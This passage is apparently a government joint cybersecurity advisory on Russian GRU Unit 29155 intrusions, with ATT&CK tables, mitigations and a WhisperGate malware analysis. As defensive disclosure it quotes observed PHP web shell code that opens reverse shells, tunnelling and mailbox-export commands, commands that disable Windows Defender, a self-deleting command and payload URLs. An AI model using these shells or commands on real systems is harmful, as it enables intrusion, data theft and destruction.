Since at least 2020, Unit 29155 cyber actors have used virtual private servers (VPSs) [T1583.003] to host their operational tools, perform reconnaissance, exploit victim infrastructure, and exfiltrate victim data. Use of VPSs are common due to the associated IP addresses not identifying their true country of origin.

Post-Exploitation

When an exploit is successfully executed on a victim system, the actors can then launch a Meterpreter payload [T1105], which commonly uses a reverse Transmission Control Protocol (TCP) connection to initiate communication with the threat actors’ infrastructure [T1095]. In one instance, an established reverse TCP session was observed from victim to actor infrastructure via the following ports:

• 1234
• 1851
• 43221
• 443
• 4444
• 4688
• 5432
• 8080
• 8081
• 8082
• 8084
• 8085
• 8088
• 8089
• 8090
• 8443
• 8487
• 8888

Additional observations were collected from victim engagement and analysis, including:

• Use of the Metasploit Framework to search for and/or access modules such as mysql, postgres, and ssh software and features.
• Use of Meterpreter and Netcat to execute reverse shells over ports such as 8081.
• Use of Impacket.
• Use of PHP (exp_door v1.0.2, b374k, WSO 4.0.5) and the P.A.S. web shells [T1505.003], likely for initial access.
• Use of EternalBlue.[16],[17]
• Use of reGeorg or Neo-reGeorg to set up a proxy to tunnel network traffic following compromise of a victim website, as well as use of ProxyChains to run Nmap within the network.

Encrypted Communication

Once Unit 29155 cyber actors gain access to the victims’ internal network, the victims have observed:

1. Using Domain Name System (DNS) tunneling tools, such as dnscat/2 and Iodine, to tunnel IPv4 network traffic [T1071.004]. For example, Iodine was used to tunnel data via dns.test658324901domain.me.
2. Configuring a proxy within the victim infrastructure and executing commands within the network via ProxyChains. ProxyChains—a tool used to route internal traffic through a series of proxies [T1090.003]—has been used to provide further anonymity and modify system configuration to force network traffic through chains of SOCKS5 proxies and respective ports. The following ports used by actor infrastructure include:
   1. 1080
   2. 1333
   3. 13381
   4. 13391
   5. 13666
   6. 13871
   7. 1448
   8. 1888
   9. 3130
   10. 3140
   11. 4337
   12. 50001
   13. 8079
3. Using the GOST open source tunneling tool (via SOCKS5 proxy) named java, as detailed in the following running processes in victim incident response results:

8212 - SJ 0:02.54 HISTFILE=/dev/null
PATH=/sbin:/bin:/usr/sbin:/usr/bin
LD_LIBRARY_PATH=/usr/local/lib:/usr/local/lib OLDPWD=/tmp
PWD=/tmp/.ICE-unix HOME=/ RC PID=33980 ./java –L
socks5://127.0.0.1:13338

8282 - IJ 0:03.98 HISTFILE=/dev/null
PATH=/sbin:/bin:/usr/sbin:/usr/bin
LD_LIBRARY_PATH=/usr/local/lib:/usr/local/lib OLDPWD=/tmp
PWD=/tmp/.ICE-unix HOME=/ RC_PID=33980 ./java –L
rtcp://0.0.0.0:13381/127.0.0.1:13338 -F socks5://{IP Address}:7896

1. Modifying .php scripts to manipulate server-side operations, such as the observations listed in Table 2 below.

Script (Base64 Decoded)	Command	Purpose
usr/local/www/apache24/data/-redacted-/plugins/extension/oomla/oomla.php	if (isset($ POST ["sessionsid_wp"] )) { $poll id = $ POST ["sessionsid_wp") ; $sessii = explode(":", base64_decode($poll_id)) ;$sock=fsockopen($sessii[O) ,$sessii[l)); $proc=proc_open(/bin/sh -i), array(O=>$sock, l=>$sock, 2=>$sock) ,$pipes); }	Creates session.
Usr/local/www/apache24/data/-redacted-/plugins/authentication/joomla/oomla.php	function nb_res($a) { eval(system('base64 decode ($a) '); }	Allows program to run.
Usr/local/www/apache24/data/-redacted-/plugins/privacy/contact/contact.php	if (isset($_POST['fl'])) { $fl=$_POST['fl'] ; $f2=$_POST['f2'] ; $content = base64 decode($fl); $h = fopen($f2."w"); $text = "$content"; fwrite($h.$text) ; fclose ($h) ; }	Allows writing to files.

Exfiltration

In several instances, analysis identified Unit 29155 cyber actors compressing victim data [T1560] (e.g., the entire filesystem, select file system artifacts or user data, and/or database dumps) to send back to their infrastructure. These cyber actors commonly use the command-line program Rclone to exfiltrate data to a remote location from victim infrastructure.

Unit 29155 cyber actors have exfiltrated Windows processes and artifacts, such as Local Security Authority Subsystem Service (LSASS) memory dumps [T1003.001], Security Accounts Manager (SAM) files [T1003.002], and SECURITY and SYSTEM event log files [T1654]. As seen in victim incident response results, actor infrastructure has also been used to compromise multiple mail servers [T1114] and exfiltrate mail artifacts, such as email messages, using PowerShell [T1059.001] via the following command:

powershell New-MailboxExportRequest – Mailbox <resource> – FilePath `\{IP Address}sharefolder1.pst`

MITRE ATT&CK Tactics and Techniques

See Table 3 to Table 14 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 3: Reconnaissance

Technique Title	ID	Use
Gather Victim Network Information: DNS	T1590.002	Unit 29155 cyber actors have used Amass and VirusTotal to obtain information about victims’ DNS for possible use during targeting, such as subdomains for target websites.
Active Scanning	T1595	Unit 29155 cyber actors use publicly available tools to gather information for possible use during targeting.
Active Scanning: Scanning IP Blocks	T1595.001	Unit 29155 cyber actors use various open source scanning tools to scan for victim IP ranges.
Active Scanning: Vulnerability Scanning	T1595.002	Unit 29155 cyber actors use publicly available scanning tools to enable their discovery of IoT devices and exploitable vulnerabilities. Tools leveraged for scanning include Acunetix, Amass, Droopescan, eScan, and JoomScan.
Search Open Technical Databases: Scan Databases	T1596.005	Unit 29155 cyber actors use publicly available platforms like Shodan to identify internet connected hosts.

Table 4: Resource Development

Technique Title	ID	Use
Acquire Infrastructure: Virtual Private Server	T1583.003	Unit 29155 cyber actors have used VPSs to host their operational tools, perform reconnaissance, exploit victim infrastructure, and exfiltrate victim data.
Obtain Capabilities: Malware	T1588.001	Unit 29155 cyber actors obtain publicly available malware and malware loaders to support their operations. For example, analysis suggests Raspberry Robin malware may have been used in the role of an access broker.
Obtain Capabilities: Exploits	T1588.005	Unit 29155 cyber actors are known to obtain CVE exploit scripts from GitHub repositories and use them against victim infrastructure.

Table 5: Initial Access

Technique Title	ID	Use
Valid Accounts: Default Accounts	T1078.001		Unit 29155 cyber actors use exploitation scripts to authenticate to IP cameras with default usernames and passwords.
Exploit Public-Facing Application	T1190	Unit 29155 cyber actors have used a variety of public exploits, including CVE-2021-33044, CVE-2021-33045, CVE-2022-26134, and CVE-2022-26138. The proof of concept exploit for CVE-2022-26134, Through the Wire, has also been used against a victim’s internet-facing Confluence server.

Table 6: Execution

Technique Title	ID	Use
Command and Scripting Interpreter: PowerShell	T1059.001	Unit 29155 cyber actors have used PowerShell to execute commands and other operational tasks.

Table 7: Persistence

Technique Title	ID	Use
Server Software Component: Web Shell	T1505.003	Unit 29155 cyber actors use web shells to establish persistent access to systems.

Table 8: Credential Access

Technique Title	ID	Use
OS Credential Dumping: LSASS Memory	T1003.001	Unit 29155 cyber actors have exfiltrated LSASS memory dumps to retrieve credentials from victim machines.
OS Credential Dumping: Security Account Manager	T1003.002	Unit 29155 cyber actors have exfiltrated usernames and hashed passwords from the SAM.
Brute Force: Password Spraying	T1110.003	Unit 29155 cyber actors targeted victims’ Microsoft OWA infrastructure with password spraying to obtain valid usernames and passwords.
Unsecured Credentials: Credentials in Files	T1552.001	Following exploitation of vulnerable IP cameras, Unit 29155 cyber actors dump configuration settings and credentials in plaintext.

Table 9: Discovery

Technique Title	ID	Use
Network Service Discovery	T1046	Once Unit 29155 cyber actors gained access to victim internal networks, they further used Nmap (via the NSE) to write custom scripts for discovering and scanning other machines.
Log Enumeration	T1654	Unit 29155 cyber actors have enumerated and exfiltrated SECURITY and SYSTEM logs.

Table 10: Lateral Movement

Technique Title	ID	Use
Use Alternate Authentication Material: Pass the Hash	T1550.002	Unit 29155 cyber actors used Pass-the-Hash to authenticate via SMB.

Table 11: Collection

Technique Title	ID	Use
Email Collection	T1114	Unit 29155 cyber actors have used their infrastructure to compromise multiple victims’ mail servers and exfiltrate mail artifacts, such as email messages.
Video Capture	T1125	Unit 29155 cyber actors have exploited IoT devices, specifically IP cameras with default usernames and passwords, and exfiltrated images.
Data from Information Repositories: Confluence	T1213.001	Unit 29155 cyber actors leveraged Through the Wire against the victim’s internet-facing Confluence server.
Archive Collected Data	T1560	Unit 29155 cyber actors compress victim data (e.g., the entire filesystem, select file system artifacts or user data, and/or database dumps) to send back to their infrastructure.

Table 12: Command and Control

Technique Title	ID	Use
Proxy: Multi-hop Proxy	T1090.003	Unit 29155 cyber actors executed commands via ProxyChains—a tool used to route internal traffic through a series of proxies. ProxyChains was also used to provide further anonymity and modify system configuration to force network traffic through chains of SOCKS5 proxies and respective ports.
Application Layer Protocol: Web Protocols	T1071.001	Unit 29155 cyber actors use POST requests over HTTP to send payloads to victims.
Application Layer Protocol: DNS	T1071.004	Unit 29155 cyber actors used DNS tunneling tools, such as dnscat/2 and Iodine, to tunnel IPv4 network traffic.
Non-Application Layer Protocol	T1095	Unit 29155 cyber actors commonly use a reverse TCP connection to initiate communication with their infrastructure.
Ingress Tool Transfer	T1105	When an exploit is successfully executed on a victim system, Unit 29155 cyber actors are known to launch the Meterpreter payload to initiate communication with their actor-controlled systems.
Protocol Tunneling	T1572	Unit 29155 cyber actors have used infrastructure configured with OpenVPN configuration to tunnel traffic over a single port (1194), VPNs, and GOST to anonymize their operational activity.

Table 13: Exfiltration

Technique Title	ID	Use
Exfiltration Over Web Service: Exfiltration to Cloud Storage	T1567.002	Unit 29155 cyber actors exfiltrated data to the cloud storage and file hosting service, MEGA (mega[.]nz), using Rclone.

Table 14: Impact

Technique Title	ID	Use
Data Destruction	T1485	Unit 29155 cyber actors’ objectives include the destruction of data.

Mitigations

The authoring agencies recommend organizations implement the mitigations supplied below to improve organizational cybersecurity posture based on threat actor activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

Limit Adversarial Use of Common Vulnerabilities

• Prioritize patching to CISA’s Known Exploited Vulnerabilities Catalog, especially for CVEs identified in this advisory, and then critical and high vulnerabilities that allow for remote code execution on internet-facing devices.
• Conduct regular automated vulnerability scans to perform vulnerability assessments on all network resources based on threat actor behaviors and known exploitable vulnerabilities (CISA CPG 1.E).
• Limit exploitable services on internet-facing assets, such as email and remote management protocols (CISA CPGs 2.M, 2.W). Where necessary services must be exposed, such as services hosted in a demilitarized zone (DMZ), implement the appropriate compensatory controls to prevent common forms of abuse and exploitation. Disable all unnecessary operating system applications and network protocols to combat adversary enumeration. For additional guidance, see CISA Insights: Remediate Vulnerabilities for Internet-Accessible Systems.
• U.S. organizations can utilize a range of CISA services at no cost, including vulnerability scanning and testing, to help organizations reduce exposure to threats. CISA Cyber Hygiene services can provide additional review of internet-accessible assets and provide regular reports on steps to take to mitigate vulnerabilities. Email vulnerability@cisa.dhs.gov with the subject line, “Requesting Cyber Hygiene Services,” to get started.
• Software manufacturers, vendors, and consumers are encouraged to review CISA and NIST’s Defending Against Supply Chain Attacks. This publication provides an overview of software supply chain risks and recommendations for how software customers and vendors can use the NIST Cyber Supply Chain Risk Management (C-SCRM) Framework and the Secure Software Development Framework (SSDF) to identify, assess, and mitigate software supply chain risks. CISA recommends comprehensive mitigations for supply chain incident reporting, vulnerability disclosing (e.g., security.txt), and choosing a trusted supplier or vendor that observes proper cyber security hygiene (CISA CPG 1.G, 1.H, 1.I) to defend against upstream attacks.

Deploy Protective Controls and Architecture

• Implement network segmentation. Network segmentation can help prevent lateral movement by controlling traffic flows between—and access to—various subnetworks (CISA CPG 2.F). Best practice mitigations include updating Identity and Access Management (IAM) and employing phishing-resistant MFA for all devices and accounts identified as organizational assets. For additional guidance, see CISA and NSA’s IAM Recommended Best Practices Guide for Administrators (CISA CPG 2.H).
• Verify and ensure that sensitive data, including credentials, are not stored in plaintext and can only be accessed by authenticated and authorized users. Credentials must be stored in a secure manner, such as with a credential/password manager to protect from malicious enumeration (CISA CPG 2.L).
• Disable and/or restrict use of command line and PowerShell activity. Update to the latest version and uninstall all earlier PowerShell versions (CISA CPG 2.N).
• Implement a continuous system monitoring program, such as security information and event management (SIEM) or endpoint detection and response (EDR) solutions, to comprehensively log and review all authorized external access connections. This logging will better ensure the prompt detection of misuse or abnormal activity (CISA CPG 2.T).
• Monitor for unauthorized access attempts and programming anomalies through comprehensive logging that is secured from modification, such as limiting permissions and adding redundant remote logging (CISA CPG 2.U). Security appliances should be set to detect and/or block Impacket framework indicators, PSExec or WMI commands, and suspicious PowerShell commands for timely identification and remediation.
• Identify any use of outdated or weak encryption, update these to sufficiently strong algorithms, and consider the implications of post-quantum cryptography (CISA CPG 2.K). Use properly configured and up-to-date Secure Socket Layer (SSL)/Transport Layer Security (TLS) to protect data in transit.

Security Controls

In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

1. Select an ATT&CK technique described in this advisory (see Table 3 to Table 14).
2. Align your security technologies against the technique.
3. Test your technologies against the technique.
4. Analyze your detection and prevention technologies’ performance.
5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

Resources

• MITRE: WhisperGate
• CISA AA22-057A: Destructive Malware Targeting Organizations in Ukraine
• DOJ Press Release: Russian National Charged for Conspiring with Russian Military Intelligence to Destroy Ukrainian Government Computer Systems and Data
• FBI: Cyber Crime
• CISA: Russia Cyber Threat Overview and Advisories
• MITRE: Group G1003 - Ember Bear
• MITRE: Impacket
• NIST NVD: CVE-2020-1472
• NIST NVD: CVE-2021-26084
• NIST NVD: CVE-2021-3156
• NIST NVD: CVE-2021-4034
• NIST NVD: CVE-2022-27666
• NIST NVD: CVE-2021-33044
• NIST NVD: CVE-2021-33045
• NIST NVD: CVE-2022-26134
• NIST NVD: CVE-2022-26138
• NIST NVD: CVE-2022-3236
• MITRE: BloodHound
• MITRE: Rclone
• MITRE: P.A.S. Webshell
• CISA: Known Exploited Vulnerabilities Catalog
• CISA Insights: Remediate Vulnerabilities for Internet-Accessible Systems
• CISA, NIST: Defending Against Supply Chain Attacks
• CISA, NSA: IAM Recommended Best Practices Guide for Administrators

References

1. Microsoft Threat Intelligence Center: Destructive Malware Targeting Ukrainian Organizations
2. Microsoft Threat Intelligence Center: Cadet Blizzard Emerges as a Novel and Distinct Russian Threat Actor
3. CrowdStrike: EMBER BEAR Threat Actor Profile
4. Mandiant Threat Intelligence: Responses to Russia's Invasion of Ukraine Likely to Spur Retaliation 
5. SentinelOne: Threat Actor UAC-0056 Targeting Ukraine with Fake Translation Software
6. Introduction to Acunetix
7. GitHub: OWASP Amass
8. Kali Linux Tutorials: Droopescan
9. GitHub: OWASP JoomScan
10. Kali.org: MASSCAN
11. DigitalOcean: How To Use Netcat to Establish and Test TCP and UDP Connections
12. Shodan: What is Shodan?
13. VirusTotal: How it Works
14. GitHub: Through the Wire
15. Confluence Security Advisory: Confluence Server and Data Center - CVE-2022-26134
16. Microsoft: Security Bulletin MS17-010
17. Avast: What is EternalBlue and Why is the MS17-010 Exploit Still Relevant?
18. Palo Alto Networks Unit 42: Threat Brief - Ongoing Russia and Ukraine Cyber Activity
19. CERT-UA#3799 Report
20. Bellingcat: Attack on Ukrainian Government Websites Linked to GRU Hackers
21. Trend Micro: Cyberattacks are Prominent in the Russia-Ukraine Conflict

Contact Information

To report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory, contact your local FBI field office or CISA’s 24/7 Operations Center at Report@cisa.gov or (888) 282-0870. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov.

Disclaimer

The information in this report is being provided “as is” for informational purposes only. CISA and the authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and the authoring agencies.

Version History

September 5, 2024: Initial version.

Appendix A: WhisperGate Malware Analysis

Overview

This technical analysis details the WhisperGate malware deployed against Ukraine; samples were collected from one victim and analyzed. The analysis provides insight into Unit 29155 cyber actor infrastructure used for network scanning, password compromising, and data exfiltration against Ukraine, NATO members in Europe and North America, and countries in Latin America and Central Asia.

Unit 29155 cyber actors’ use of WhisperGate involved the deployment of the malware files, stage1.exe and stage2.exe. WhisperGate has two stages that corrupts a system’s master boot record, displays a fake ransomware note, and encrypts files based on certain file extensions (see AA22-057A). The actors used multiple Discord accounts to store malware files, including what appears to be development versions or iterations of the binaries. Discord is commonly leveraged by threat actors as an endpoint for malware distribution and control; in this case, it was used to obtain the next step of the infection chain by directly sharing files through its platform. In the case of stage2.exe, the binary communicated with Discord to obtain Tbopbh.jpg—the malicious payload that is in-memory loaded and performs the destructive capabilities.[18]

Categorization

The Discord accounts associated with the WhisperGate campaign are categorized into three main clusters, labeled below as Clusters 1, 2, and 3. All clusters used Discord as a staging environment for malware deployment. These groupings are based on analysis of threat actor IP addresses and the nature of the malware that existed within the accounts. The following sections include notable details found within each cluster.

Cluster 1

Cluster 1 contained the following files:

• hxxps://cdn.discordapp[.]com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg (a resource, e.g., payload, for stage2.exe)[18]
• saint.exe (a downloader, SaintBot, as detailed by CERT-UA)[19]
• puttyjejfrwu.exe[19]

Cluster 2

Cluster 2 contained:

• hxxps://cdn.discordapp[.]com/attachments/888408190625128461/895633952247799858/n.lashevychdirekcy.atom.gov.ua.zip (means for sending malware in over 35 different zip files via Discord links)[20]
• Several Microsoft Word documents with macros that download test01.exe from 3237.site. Once executed, test01.exe downloads load2022.exe from smm2021.net.

Cluster 3

Cluster 3 contained:

• hxxps://cdn.discordapp[.]com/attachments/945968593030496269/945970446149509130/Client.exe (Note: Unit 29155 cyber actors’ use of Client.exe was confirmed as linked to the activity, but the file was not obtained for analysis and functionality cannot be confirmed.) 
• asd.exe (likely a development version of stage1.exe)

Behavioral Analysis

Two Windows Portable Executable (PE) files (stage1.exe and stage2.exe) were obtained from the Ukrainian victim for analysis. One PE file (asd.exe) was obtained from a U.S. victim.

stage1.exe

stage1.exe was obtained from the C: path of the Ukrainian victim’s Windows machine. stage1.exe executes when the infected device is powered down, overwriting the master boot record (MBR) and preventing the system from booting normally. Table 15 lists the hashes and properties attributed to stage1.exe.

Table 15: stage1.exe Properties

MD5	5d5c99a08a7d927346ca2dafa7973fc1
SHA-256	a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92
Compiler	MinGW(GCC: (GNU) 6.3.0)[-]
Linker	GNU linker Id (GNU Binutils)(2.28)[GUI32]
TimeDateStamp	2022-01-10 05:37:18
Execution Message	Your hard drive has been corrupted. In case you want to recover all hard drives of your organization, You should pay us $10k via bitcoin wallet 1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv and send message via tox ID 8BEDC411012A33BA34F49130D0F186993C6A32DAD8976F6A5D82C1ED23054C057ECED5496F65 with your organization name. We will contact you to give further instructions.

Table 16: asd.exe Properties

MD5	eac0ae655d344c25ff467a929790885c
SHA-256	b9e64b58d7746cb1d3bed20405ef34d097af08c809d8dad10b9296b0bebb2b0b
Compiler	MinGW(GCC: (GNU) 6.3.0)[-]
Linker	GNU linker Id (GNU Binutils)(2.28)[Console32,console]
TimeDateStamp	1969-12-31 19:00:00

asd.exe is likely a development version of stage1.exe. While the behavior of asd.exe is similar to stage1.exe, the messages displayed were different.

stage2.exe

stage2.exe was obtained from the C: path of the Ukrainian victim’s Windows machine. Table 17 lists the hashes and properties attributed to stage2.exe.

Table 17: stage2.exe Properties

MD5	764f691b2168e8b3b6f9fb6582e2f819
SHA-256	aa79afbf82b06cda268664b7c83900d8f7a33e0f0071facba0b3d8f7a68ce56a
Library	.NET(v4.0.30319)[-]
Linker	Microsoft Linker(6.0)(GUI32,signed)
TimeDateStamp	2022-01-10 09:39:54

Table 18 lists the following chronological observations when stage2.exe executes.

Table 18: stage2.exe Behavioral Analysis Observations

Event	Victim Observation
PowerShell command executed twice	C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" –enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
Base64 UTF-16LE string decoded	Start-Sleep -s 10
HTTP GET request sent to Discord URL to download Tbopbh.jpg	hxxp://cdn.discordapp.com/attachments/ 928503440139771947/930108637681184768/Tbopbh[.]jpg
Nmddfrqqrbyjeygggda.vbs created and executed within the %TEMP% directory	The Visual Basic Script (VBS) file contained the following command: CreateObject(“WScript.Shell”).Run “powershell Set-MpPreference -ExclusionPath ‘C:’”, 0, False
AdvancedRun.exe created and executed twice	C:Users<user>AppDataLocalTempAdvancedRun.exe” /EXEFilename “C:WindowsSystem32sc.exe” /WindowState 0 /CommandLine “stop WinDefend”  /StartDirectory “” /RunAs 8 /Run C:Users<user>AppDataLocalTempAdvancedRun.exe” /EXEFilename “C:WindowsSystem32WindowsPowerShellv1.0powershell.exe” /WindowState 0 /CommandLine “rmdir ‘C:ProgramDataMicrosoftWindows Defender’ –Recurse” /StartDirectory “” /RunAs 8 /Run
InstallUtil.exe created and executed; files corrupted following execution	C:Users<user>AppDataLocalTempInstallUtil.exe

Static Analysis

Static analysis was further conducted on two files (stage2.exe, Tbopbh.jpg) to uncover additional malware functionality and attributes.

stage2.exe

Static analysis was performed on a variant of stage2.exe; its hashes and properties are listed in Table 19 below. Of note, the MD5 and SHA-256 hash values were different than those obtained from the Ukrainian victim machine (listed above in Table 17). Behavioral analysis was also performed on the below variant and both files exhibited the same behavior.

Table 19: stage2.exe Variant Properties

MD5	14c8482f302b5e81e3fa1b18a509289d
SHA-256	dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Library	.NET(v4.0.30319)[-]
Linker	Microsoft Linker(6.0)(GUI32,signed)
TimeDateStamp	2022-01-10 09:39:54

This variant of stage2.exe contained multiple layers of execution:

• stage2.exe contained a WebClient object that was initialized with Discord URL hxxps://cdn.discordapp.com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg to obtain the payload Tbopbh.jpg.
• stage2.exe contained logic to reverse file bytes of a file using the Array’s Reverse method.
• stage2.exe contained logic to load an Assembly object into a Stream object.
• stage2.exe used the reflection library to call method Ylfwdwgmpilzyaph from the loaded Assembly object.
• stage2.exe contained decryption logic that resembled RC4, a C# class produced a base64 string and an encryption class which created a key using the decoded string. The encryption class used encryption logic every 32 bytes to decrypt. Additionally, the XOR functionality occurred using the initialized byte “Array” shown below. The encryption class resembled RC4; it was used every 32 bytes. The base64 string came from a class that contained EazFuscator logic to obfuscate code by eliminating control flow within code, as well as making symbols difficult to analyze:
  • byte[] array = new byte[] {148, 68, 208, 52, 241, 93, 195, 220};
• stage2.exe contained EazFuscator class logic. This included logic that built strings during runtime; otherwise, the full strings would have been obfuscated and further segmented when viewed statically. The following is an example of a built string:
  • UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
• When the above string was base64 decoded, the system displayed the following PowerShell command: Start-Sleep -s 10
• stage2.exe served as the downloader and driver logic for the malware payload, Tbopbh.jpg.

Tbopbh.jpg (payload for stage2.exe variant)

An account in Discord Cluster 1 contained malware with the following hashes, labeled as Tbopbh.jpg:

• MD5: b3370eb3c5ef6c536195b3bea0120929
• SHA-256: 923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6

When viewing payload Tbopbh.jpg using a hex editor, it ended with value “ZM” or hex values “5A 4D”—this indicated the payload was a reversed PE. Reversing the bytes of Tbopbh.jpg revealed the hashes of the resulting payload listed in Table 20 below.

Table 20: Tbopbh.jpg Properties

MD5	e61518ae9454a563b8f842286bbdb87b
SHA-256	9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d
Protector	Eazfuscator(-)[-]
Library	.NET(v4.0.30319)[-]
Linker	Microsoft Linker(6.0)[DLL32]
TimeDateStamp	2022-01-10 09:39:31

The original filename from the resulting payload was a Dynamic Link Library (DLL) file, Frkmlkdkdubkznbkmcf.dll; its attributes are listed in Table 21:

Table 21: Frkmlkdkdubkznbkmcf.dll Attributes

Resources	Classes	Methods
u2005 u2005 u2009 u2008 u2001 u2007 u2009 u200b u200a u2005 Note: This format annotates action taken by EazFuscator to obfuscate items, making it difficult for malware analysts to review.	Main - ClassLibrary1	u0002
7c8cb5598e724d34384cce7402b11f0e	pc1eOx2WJVV1579235895 –	Ylfwdwgmpilzyaph
78c855a088924e92a7f60d661c3d1845

stage2.exe was observed calling method Ylfwdwgmpilzyaph to begin decrypting resource 78c855a088924e92a7f60d661c3d1845. The reflection library was used to execute method Ylfwdwgmpilzyaph, as shown in the following C# code block:

using System.Reflection;
string path = "Frkmlkdkdubkznbkmcf.dll";
string fqpn = Path.GetFullPath(path);
Assembly assembly = Assembly.LoadFile(fqpn);
Type type = assembly.GetType("ClassLibrary1.Main");
type.InvokeMember("Ylfwdwgmpilzyaph", BindingFlags.InvokeMethod, null, null, null);

The following application configuration accompanied the above code block to allow loading from remote sources:

<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<runtime>
<loadFromRemoteSources enabled="true"/>
</runtime>
</configuration>

Upon invoking the method Ylfwdwgmpilzyaph, Nmddfrqqrbyjeygggda.vbs wrote to the Windows %TEMP% directory and has the following attributes, as listed in Table 22 below.

Table 22: Nmddfrqqrbyjeygggda.vbs Attributes

MD5	6eed4ee0cc57126e9a096ab9905f471c
SHA-256	db5a204a34969f60fe4a653f51d64eee024dbf018edea334e8b3df780eda846f
VBS Code	CreateObject("WScript.Shell").Run "powershell Set-MpPreference -ExclusionPath 'C:'", 0, False

The VBS code listed in Table 22 used a WScript shell that executed as a Windows application, which ran a PowerShell command to exclude the C: drive from Windows Defender's security checks. Malware analysts decoded and decrypted one of the resources from Frkmlkdkdubkznbkmcf.dll (78c855a088924e92a7f60d661c3d1845). Further analysis of Frkmlkdkdubkznbkmcf.dll resulted in an additional DLL file with the following hashes:

• MD5: 5a537673c34933fc854fbfb65477a686
• SHA-256: 35feefe6bd2b982cb1a5d4c1d094e8665c51752d0a6f7e3cae546d770c280f3a

This decrypted DLL file contained two resources, AdvancedRun and Waqybg.

• AdvancedRun (GZIP)
  • MD5: de85ca91e1e8100a619de1c25112f1a5
  • SHA-256: 489ab4819830d231c3fc3572c5386cad9d18773a8121373ea8174de981cc9166
• Waqybg (GZIP)
  • Reversed byte order:
    • MD5: 9b1191f1ceddf312b0d609cd929c6631
    • SHA-256: 0dd61a16c625c49ffefaf4ce24cabf9a074028a06640d9bbb804f735ff56dfa3
  • Original byte order:
    • MD5: 29d83f29c0b0a0b7499e71e7d5cb713f
    • SHA-256: fd4a5398e55beacb2315687a75af5aa15b776b5d36b9800a1792ede3955616c2

Table 23 and Table 24 list the file properties for both the AdvancedRun and reversed Waqybg decompressed files.

Table 23: AdvancedRun (decompressed)

Type	Win32 EXE
Company	NirSoft
TimeStamp	2020:08:03 09:41:38-04:00
Original File Name	AdvancedRun.exe
MD5	17fc12902f4769af3a9271eb4e2dacce
SHA-256	29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

Table 24: Waqybg (reversed; decompressed)

Type	Win32 EXE
TimeStamp	2022:01:10 03:14:38-05:00
MD5	3907c7fbd4148395284d8e6e3c1dba5d
SHA-256	34ca75a8c190f20b8a7596afeb255f2228cb2467bd210b2637965b61ac7ea907
Compiler	MinGW(GCC: (GNU) 6.3.0)[-]
Linker	GNU linker Id (GNU Binutils)(2.28)[Console32,console]

The reversed and decompressed Waqybg files contained file corruption logic along with a final command to ping arbitrarily and delete itself: cmd.exe /min /C ping 111.111.111.111 -n 5 -w 10 > Nul & Del /f /q “%s”. Waqybg is known as WhisperKill—a malware downloaded by WhisperGate that destroys files with specific extensions.[19],[21]

The following file extensions listed in Table 25 were targeted for file corruption with the equivalent of the “wcscmp” C function logic (a string compare function). The corruption logic included overwriting 0x100000 or 1 MB worth of 0xcc values per targeted file.

Table 25: File Extensions Targeted by WhisperKill

u".3DM"	u".3DS"	u".602"	u".ACCDB"	u".ARC"	u".ASC"
u".ASM"	u".ASP"	u".ASPX"	u".BACKUP"	u".BAK"	u".BAT"
u".BMP"	u".BRD"	u".BZ2"	u".CGM"	u".CLASS"	u".CMD"
u".CONFIG"	u".CPP"	u".CRT"	u".CSR"	u".CSV"	u".DBF"
u".DCH"	u".DER"	u".DIF"	u".DIP"	u".DJVU.SH"	u".DOC"
u".DOCB"	u".DOCM"	u".DOCM"	u".DOCX"	u".DOT"	u".DOTM"
u".DOTX"	u".DWG"	u".EDB"	u".EML"	u".FRM"	u".GIF"
u".HDD"	u".HTM"	u".HWP"	u".IBD"	u".INC"	u".INI"
u".ISO"	u".JAR"	u".JAVA"	u".JPEG"	u".JPG"	u".JSP"
u".KDBX"	u".KEY"	u".LAY"	u".LAY6"	u".LDF"	u".LOG"
u".MAX"	u".MDB"	u".MDF"	u".MML"	u".MSG"	u".MYD"
u".MYI"	u".NEF"	u".NVRAM"	u".ODB"	u".ODG"	u".ODP"
u".ODS"	u".ODT"	u".OGG"	u".ONETOC2"	u".OST"	u".OTG"
u".OTP"	u".OTS"	u".OTT"	u".P12"	u".PAQ"	u".PAS"
u".PDF"	u".PEM"	u".PFX"	u".PHP"	u".PHP3"	u".PHP4"
